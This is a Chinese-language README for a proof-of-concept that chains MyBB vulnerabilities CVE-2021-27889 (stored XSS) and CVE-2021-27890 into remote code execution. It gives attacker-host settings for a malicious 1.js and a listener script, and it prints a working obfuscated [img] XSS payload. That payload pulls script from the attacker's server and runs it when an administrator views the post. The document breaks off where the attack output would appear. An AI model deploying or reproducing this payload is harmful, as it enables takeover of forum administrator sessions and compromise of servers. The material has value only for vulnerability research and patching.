Mybb 关联 CVE-2021-27890 & CVE-2021-27889 到 RCE POC
使用前:
这里有两个文件:1.js 和 attack_listen.py
你应该修改这两个文件:
1.js:
修改 mybb 论坛 URL 和攻击 URL:
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py
attack_listen.py
修改攻击主机和攻击端口:
attack_host = '192.168.92.165'
attack_port = 8080
用法:
CVE-2021-27889 是 XSS。你应该在"新帖子"或"回复"或"私信"中注入以下有效载荷,然后再进行攻击。在这个演示中,我将有效载荷发送到"新帖子"。
注意:192.168.92.165 是恶意服务器 IP,你应该更改它。
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]

现在我们的恶意 JS 1.js 成功注入。然后我们应该等待管理员在已登录的管理页面 cookie 下浏览这个帖子。
注意:管理员用户无需登录论坛页面。
在等待期间,我们应该在攻击机上运行 "attack_listen.py",以判断管理员用户是否被攻击。
python3 attack_listen.py
当管理员用户浏览恶意帖子时,恶意 JS 将执行攻击:

我们可以在攻击机上收到信息:

